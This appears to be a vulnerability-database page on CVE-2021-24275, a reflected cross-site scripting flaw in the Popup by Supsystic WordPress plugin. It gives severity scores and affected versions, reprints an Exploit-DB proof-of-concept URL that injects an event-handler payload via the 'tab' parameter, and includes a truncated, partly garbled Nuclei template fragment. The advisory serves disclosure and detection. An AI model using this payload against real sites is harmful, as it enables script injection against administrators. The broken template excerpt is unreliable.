CVE-2021-24275
published 2021-05-05CVE-2021-24275: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a…
PriorityP346medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
18.16%
96.8th percentile
The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | popup | < 1.10.5 | 1.10.5 |
| supsystic | popup_by_supsystic | >= 1.10.5 < 1.10.5 | 1.10.5 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
exploitdb·2021-09-28·CVSS 6.1
CVE-2021-24275 [MEDIUM] WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
---
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Nuclei
Popup by Supsystic <1.10.5 - Cross-Site scripting
nuclei·CVSS 6.1
CVE-2021-24275 [MEDIUM] Popup by Supsystic <1.10.5 - Cross-Site scripting
Popup by Supsystic alert(document.domain)'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022036ce636eec23560621a53603c4ee239e50877a036644442cd17c302c4f8d03e9022016058688f8ac1496dce4a4f815a29b6829484e6605d46231187ac14744bed346:922c64590222798bb761d5b6d8e72950
http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308fhttp://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
2021-05-05
Published